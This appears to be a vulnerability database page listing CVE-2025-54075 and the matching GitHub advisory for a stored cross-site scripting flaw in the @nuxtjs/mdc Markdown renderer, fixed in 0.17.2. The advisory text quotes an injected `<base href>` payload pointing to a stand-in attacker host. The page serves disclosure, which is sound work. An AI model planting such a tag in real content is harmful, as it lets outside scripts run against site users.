Логотип exploitDog
bind:CVE-2025-54075
Консоль
Логотип exploitDog

exploitDog

bind:CVE-2025-54075

Количество 2

Количество 2

nvd логотип

CVE-2025-54075

7 месяцев назад

MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a `<base href="https://attacker.tld">` element. The `<base>` tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context. Version 0.17.2 contains a fix for the issue.

CVSS3: 8.3
EPSS: Низкий
github логотип

GHSA-cj6r-rrr9-fg82

7 месяцев назад

Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering

CVSS3: 8.3
EPSS: Низкий

Уязвимостей на страницу

Уязвимость
CVSS
EPSS
Опубликовано
nvd логотип
CVE-2025-54075

MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a `<base href="https://attacker.tld">` element. The `<base>` tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context. Version 0.17.2 contains a fix for the issue.

CVSS3: 8.3
0%
Низкий
7 месяцев назад
github логотип
GHSA-cj6r-rrr9-fg82

Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering

CVSS3: 8.3
0%
Низкий
7 месяцев назад

Уязвимостей на страницу